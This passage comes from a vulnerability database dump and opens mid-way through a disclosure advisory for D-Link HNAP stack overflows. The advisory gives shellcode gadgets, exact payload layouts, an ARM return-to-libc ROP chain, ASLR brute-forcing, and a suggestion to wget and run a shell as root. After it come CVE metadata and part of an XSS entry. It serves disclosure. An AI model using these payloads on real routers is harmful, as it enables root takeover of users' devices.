\n  prep_shellcode_1 =  23bdf3c8 \t\t# addi\tsp,sp,-3128\n  prep_shellcode_2 =  03a0f809 \t\t# jalr\tsp\n  branch_delay =\t\t  2084f830 \t  # addi\ta0,a0,-2000 (NOP executed as a\nMIPS branch delay slot)\n\nThe final Action / Username / LoginPassword / Catpcha XML parameter\nvalue will be:\nshellcode + \u0027a\u0027 * (3072 - shellcode.size) + sleep() + \u00271\u0027 * 4 + \u00272\u0027 * 4\n+ \u00273\u0027 * 4 + third_gadget + first_gadget + \u0027b\u0027 * 0x1c + second_gadget +\n\u0027c\u0027 * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay\n\n\u0027a\u0027, \u0027b\u0027 and \u0027c\u0027 are just fillers to make up the buffer, while \u00271111\u0027,\n\u00272222\u0027 and \u00273333\u0027 will be the values of s1, s2 and s3 registers (which\nare not interesting for exploitation), and the rest is the ROP chain,\nshellcode and stack preparation routine. The only bad character that\ncannot be sent in the payload is the null byte as this is a str(n)cpy\noverflow. Up to 3350 characters can be sent, as after that it\u0027s hard to\ncontrol the overflow in a reliable way. Note that all of this is to\nexploit the first buffer overflow with strncpy, but the second buffer\noverflow can be exploited in a similar way. \n\nAs explained above, due to the use of a crippled MIPS core, generic\nshellcodes found on the Internet will likely fail. Some very simple ones\nwork, but the best is to craft a reliable one. The simple Metasploit\nbind shell also seems to work pretty reliably if no encoder is used. \n\n-----------------------\nARM exploitation\n-----------------------\n\nThe same two stack overflows affect ARM, but require less bytes to\noverflow the stack. The following snippet is the same part of\nparse_xml_value as shown for MIPS (taken from firmware 2.03b01 for the\nDIR-868 Rev. 
B):\n.text:00018F34 C30 LDR             R1, [R11,#src] ; src\n.text:00018F38 C30 LDR             R2, [R11,#n] ; n\n.text:00018F3C C30 SUB             R3, R11, #-xml_tag_var\n.text:00018F40 C30 SUB             R3, R3, #4\n.text:00018F44 C30 SUB             R3, R3, #4\n.text:00018F48 C30 MOV             R0, R3  ; dest\n.text:00018F4C C30 BL              strncpy ; first overflow occurs here\n(xml_tag_var in parse_xml_stack) with 1024+ characters\n.text:00018F50 C30 MOV             R3, #0xFFFFFBEC\n.text:00018F58 C30 LDR             R2, [R11,#n]\n.text:00018F5C C30 SUB             R1, R11, #-var_4\n.text:00018F60 C30 ADD             R2, R1, R2\n.text:00018F64 C30 ADD             R3, R2, R3\n.text:00018F68 C30 MOV             R2, #0\n.text:00018F6C C30 STRB            R2, [R3]\n.text:00018F70 C30 SUB             R3, R11, #-xml_tag_var\n.text:00018F74 C30 SUB             R3, R3, #4\n.text:00018F78 C30 SUB             R3, R3, #4\n.text:00018F7C C30 LDR             R0, [R11,#a2_ptr] ; a2_ptr is is a\nstack variable from hnap_main\n.text:00018F80 C30 MOV             R1, R3  ; src\n.text:00018F84 C30 BL              strcpy  ; second overflow occurs here\n\nThe stack size will be smaller for both parse_xml_value and hnap_main\nwhen compared to the MIPS binary. This time again it\u0027s easier to exploit\nthe easier strncpy overflow in parse_xml_value, but only 1024 bytes are\nenough to overflow the stack. As with the MIPS exploit, the only bad\ncharacter is the null byte. \n\nThe affected ARM devices have a non-executable stack (NX) and 32 bit\nASLR. NX can be defeated with ROP, and the 32 bit ASLR is weak - there\nare only 3 bytes that change in the address calculations, which means\nthere are only 4096 possible values. The attack has to be run several\ntimes until the correct base address is hit, but this can usually be\nachieved in less than 1000 attempts. \n\nThe easiest attack to perform is a return-to-libc to execute a command\nwith system(). 
To do this, R0 must point to the stack location where the\ncommand is before system() is called. All the affected ARM devices seem\nto use the same version of uClibc (libuClibc-0.9.32.1.so) for all\nfirmware versions, which makes gadget hunting much easier and allows\nbuilding an exploit that works on all the devices without any modification. \n\nfirst_gadget (pops system() address into r3, and second_gadget into PC):\n.text:00018298                 LDMFD           SP!, {R3,PC}\n\nsecond_gadget (puts the stack pointer into r0 and calls system() at r3):\n.text:00040CB8                 MOV             R0, SP\n.text:00040CBC                 BLX             R3\n\nsystem() (Executes argument in r0 (our stack pointer)\n.text:0005A270 system\n\nThe final Action / Username / LoginPassword / Catpcha XML parameter\nvalue will be:\n\u0027a\u0027 * 1024 + 0xffffffff + \u0027b\u0027 * 16 + \u0027AAAA\u0027 + first_gadget + system() +\nsecond_gadget + command\n\na / b = filler\n0xffffffff = integer n (see below)\nAAAA = R11\nfirst_gadget = initial PC\npayload = stack points here after execution of our ROP chain; it should\npoint to whatever we want system() to execute\n\nWhen the overflow happens, the stack var \"n\" is overwritten, which is\nused to calculate a memory address (see 0x18F58). In order not to crash\nthe process before the shellcode is executed, the variable needs to be\nset to a numeric value that can be used to calculate a valid memory\naddress. A good value to choose is 0xffffffff, as this will just\nsubtract 1 from the calculated memory address and prevent an invalid\nmemory access. \n\nFrom this point onwards, it\u0027s possible to execute any command in\n\"payload\". For example, wget can be used to download a shell and execute\nit or a telnet server can be started. All commands will be executed as root. \n\n\n\u003e\u003e Fix:\nDlink did not respond to my or CERT\u0027s request for information, so no\nfirmware fix is available at the time of writing. 
\nGiven that this vulnerability can only be exploited in the LAN, it is\nrecommended to have a strong wireless password to prevent untrusted\nclients from connecting to the router. \n\n\n\u003e\u003e References:\n[1]\nhttps://isc.sans.edu//diary/More+on+HNAP+-+What+is+it,+How+to+Use+it,+How+to+Find+it/17648\n\n[2] https://en.wikipedia.org/wiki/Home_Network_Administration_Protocol\n[3] http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/\n[4] http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/\n[5] http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/\n[6]\nhttps://packetstormsecurity.com/files/134370/D-Link-DIR-818W-Buffer-Overflow-Command-Injection.html\n[7] https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf\n[8]\nhttp://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection\n[9] https://github.com/rapid7/metasploit-framework/pull/7543\n[10] https://www.kb.cert.org/vuls/id/677427\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n\u003e\u003e Enabling secure digital business \u003e\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "BID",
        "id": "94130"
      },
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-6563"
      },
      {
        "db": "PACKETSTORM",
        "id": "139611"
      }
    ],
    "trust": 2.16
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-95383",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40805",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#677427",
        "trust": 3.0
      },
      {
        "db": "NVD",
        "id": "CVE-2016-6563",
        "trust": 3.0
      },
      {
        "db": "BID",
        "id": "94130",
        "trust": 2.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "40805",
        "trust": 1.8
      },
      {
        "db": "JVN",
        "id": "JVNVU99822187",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "139611",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "139836",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-95383",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-6563",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-6563"
      },
      {
        "db": "BID",
        "id": "94130"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "PACKETSTORM",
        "id": "139611"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "id": "VAR-201807-0057",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      }
    ],
    "trust": 0.69484702
  },
  "last_update_date": "2024-04-20T23:17:14.127000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Technical Support",
        "trust": 0.8,
        "url": "http://support.dlink.com/"
      },
      {
        "title": "HNAP stack overflow :: DIR-8xx Routers Affected : All Models have Remote Admin Disabled as Default ",
        "trust": 0.8,
        "url": "http://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10066"
      },
      {
        "title": "Repair measures for multiple D-Link router buffer error vulnerability",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99597"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-Other",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "https://www.kb.cert.org/vuls/id/677427"
      },
      {
        "trust": 1.9,
        "url": "https://www.exploit-db.com/exploits/40805/"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/94130"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2016/nov/38"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6563"
      },
      {
        "trust": 0.9,
        "url": "https://raw.githubusercontent.com/pedrib/poc/master/advisories/dlink-hnap-login.txt"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6563"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu99822187"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.co.in/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49611"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "http://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework/pull/7543"
      },
      {
        "trust": 0.1,
        "url": "http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/"
      },
      {
        "trust": 0.1,
        "url": "https://en.wikipedia.org/wiki/home_network_administration_protocol"
      },
      {
        "trust": 0.1,
        "url": "https://isc.sans.edu//diary/more+on+hnap+-+what+is+it,+how+to+use+it,+how+to+find+it/17648"
      },
      {
        "trust": 0.1,
        "url": "http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/"
      },
      {
        "trust": 0.1,
        "url": "https://packetstormsecurity.com/files/134370/d-link-dir-818w-buffer-overflow-command-injection.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.dlink.com/uk/en/support/support-news/2015/april/13/hnap-privilege-escalation-command-injection"
      },
      {
        "trust": 0.1,
        "url": "http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/"
      },
      {
        "trust": 0.1,
        "url": "https://dl.packetstormsecurity.net/papers/attack/dlink_hnap_captcha.pdf"
      },
      {
        "trust": 0.1,
        "url": "http://www.agileinfosec.co.uk/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-6563"
      },
      {
        "db": "BID",
        "id": "94130"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "PACKETSTORM",
        "id": "139611"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-6563"
      },
      {
        "db": "BID",
        "id": "94130"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "db": "PACKETSTORM",
        "id": "139611"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-07-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "date": "2018-07-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-6563"
      },
      {
        "date": "2016-11-07T00:00:00",
        "db": "BID",
        "id": "94130"
      },
      {
        "date": "2016-11-09T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "date": "2016-11-08T16:44:46",
        "db": "PACKETSTORM",
        "id": "139611"
      },
      {
        "date": "2016-11-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      },
      {
        "date": "2018-07-13T20:29:01.003000",
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-95383"
      },
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-6563"
      },
      {
        "date": "2016-11-24T01:08:00",
        "db": "BID",
        "id": "94130"
      },
      {
        "date": "2017-03-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      },
      {
        "date": "2019-10-09T23:19:16.267000",
        "db": "NVD",
        "id": "CVE-2016-6563"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Stack buffer overflow vulnerability in the HNAP service of D-Link routers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-005757"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201611-125"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0586

Vulnerability from variot - Updated: 2023-12-18 14:05

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/sitesurvey.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV. A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file. Note that this merged description names two different files, sitesurvey.php and wandetect.php; check the CVE-2017-14415 record for the affected path.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0586",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      }
    ]
  },
  "cve": "CVE-2017-14415",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14415",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-31794",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-105135",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2017-14415",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14415",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31794",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-580",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105135",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105135"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/sitesurvey.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV. A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105135"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14415",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105135",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105135"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008096"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-580"
      }
    ]
  },
  "id": "VAR-201709-0586",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31794"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105135"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
